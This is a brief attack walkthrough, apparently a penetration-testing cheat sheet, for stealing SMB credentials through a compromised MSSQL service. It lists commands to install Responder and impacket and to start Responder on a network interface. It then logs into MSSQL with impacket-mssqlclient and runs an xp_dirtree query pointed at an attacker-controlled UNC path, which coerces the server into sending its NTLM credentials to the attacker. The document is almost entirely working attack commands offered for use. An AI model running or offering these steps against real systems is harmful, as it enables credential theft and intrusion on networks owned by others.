Setup Request Capturer

Tools Installation.

git clone https://github.com/lgandx/Responder
cd Responder/
pip3 install -r requirements.txt
sudo apt install impacket-scripts -y


Run Responder to capture the requests.

sudo python3 Responder.py -I eth0


Execution

Login to compromised MSSQL Service with MSSQL Client.

sudo impacket-mssqlclient <user>:"<password>"@<target host> -p <port> -debug


Run the query to steal SMB’s cred after Login.

xp_dirtree '\\<attacker host>\test';